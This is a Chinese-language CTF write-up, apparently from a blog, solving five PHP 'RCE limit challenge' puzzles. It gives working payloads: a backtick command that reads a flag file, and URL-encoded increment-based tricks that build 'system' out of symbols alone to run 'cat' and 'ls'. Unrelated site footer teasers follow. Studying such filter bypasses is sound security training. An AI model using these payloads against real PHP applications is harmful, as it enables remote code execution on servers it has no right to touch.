RCE极限挑战
admin
2024-02-09 17:08:49
前言
当时做的时候就做了两题就溜了,现在回头看一下学到了不少知识。
RCE挑战1
只过滤了括号,没有过滤反引号。
code=echo `cat /f1agaaa`;
RCE挑战2
自增绕过,不过在构造 A 字母时不能用双引号了,可以用单引号连接,形成字符串,并获取字母 A。
并且版本是 php7,也就不能动态调用 eval 和 assert 了。
payload:
?_=system&__=cat /f1agaaa
ctf_show=%24_%3D%5B%5D%3B%24_%20%3D%20''.%24_%3B%24_%3D%24_%5B'!'%3D%3D'%3B'%5D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_.%24__%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D'_'.%24__.%24_%3B(%24%24__%5B'_'%5D)(%24%24__%5B'__'%5D)%3B
以下参考:
https://blog.csdn.net/m0_64815693/article/details/127951989
下面几题我就直接搬运 payload 不解释了,有兴趣的可以去上面的链接里研究,讲的很详细。
RCE挑战3
可用:
$ ( ) + , . / 0 1 ; = [ ] _
payload:
$_=([].[])[0];$_=($_/$_.$_)[0];$_++;$__=$_.$_++;$_++;$_++;$_++;$_=_.$__.$_.++$_;$$_[_]($$_[1]);//执行这一串就可以了
ctf_show=%24_%3D%28%5B%5D.%5B%5D%29%5B0%5D%3B%24_%3D%28%24_/%24_.%24_%29%5B0%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24__.%24_.%2B%2B%24_%3B%24%24_%5B_%5D%28%24%24_%5B1%5D%29%3B&_=system&1=ls
RCE挑战4
可用:
$ ( ) + , . / 0 ; = [ ] _
$_=((0/0).[])[0];$_++;$__=$_.$_++;$_++;$_++;$_++;$_=_.$__.$_.++$_;$$_[_]($$_[0]);//这样提交就可以了
ctf_show=%24_%3D%28%280/0%29.%5B%5D%29%5B0%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24__.%24_.%2B%2B%24_%3B%24%24_%5B_%5D%28%24%24_%5B0%5D%29%3B&_=system&0=ls
RCE挑战5
可用:
$ ( ) + , . / ; = [ ] _
这边主要是两个地方,一个是字符串链接和自增的执行的顺序,另一个是 gettext 扩展(支持 _())
官方:
练习两年半的篮球选手:
佚名大佬:
上一篇:Matlab:表相关的函数
相关内容
热门资讯
原创 再...
这4道汤品温润滋补,养胃不伤身、益肾强免疫,适合日常调养,坚持喝脾胃舒服、元气足、抵抗力更好。 一、...
原创 一...
大千世界总是令人很奇妙,当人们遇到不愉快的事情的时候,总是会被“做人咧,最紧要就系开心”这句经典台词...
原创 群...
玻璃门上那张"房东直租"的告示,把群哥水煮蛙最后一点体面也撕了下来。 红色招牌还在,灯却再也不会亮。...
“食”不相瞒!长治养老陪餐制度...
“大爷,今天这豆角焖面软硬咋样?黄焖鸡块合口不?” “不错!软乎、香,正适合我们这岁数的人吃!” 5...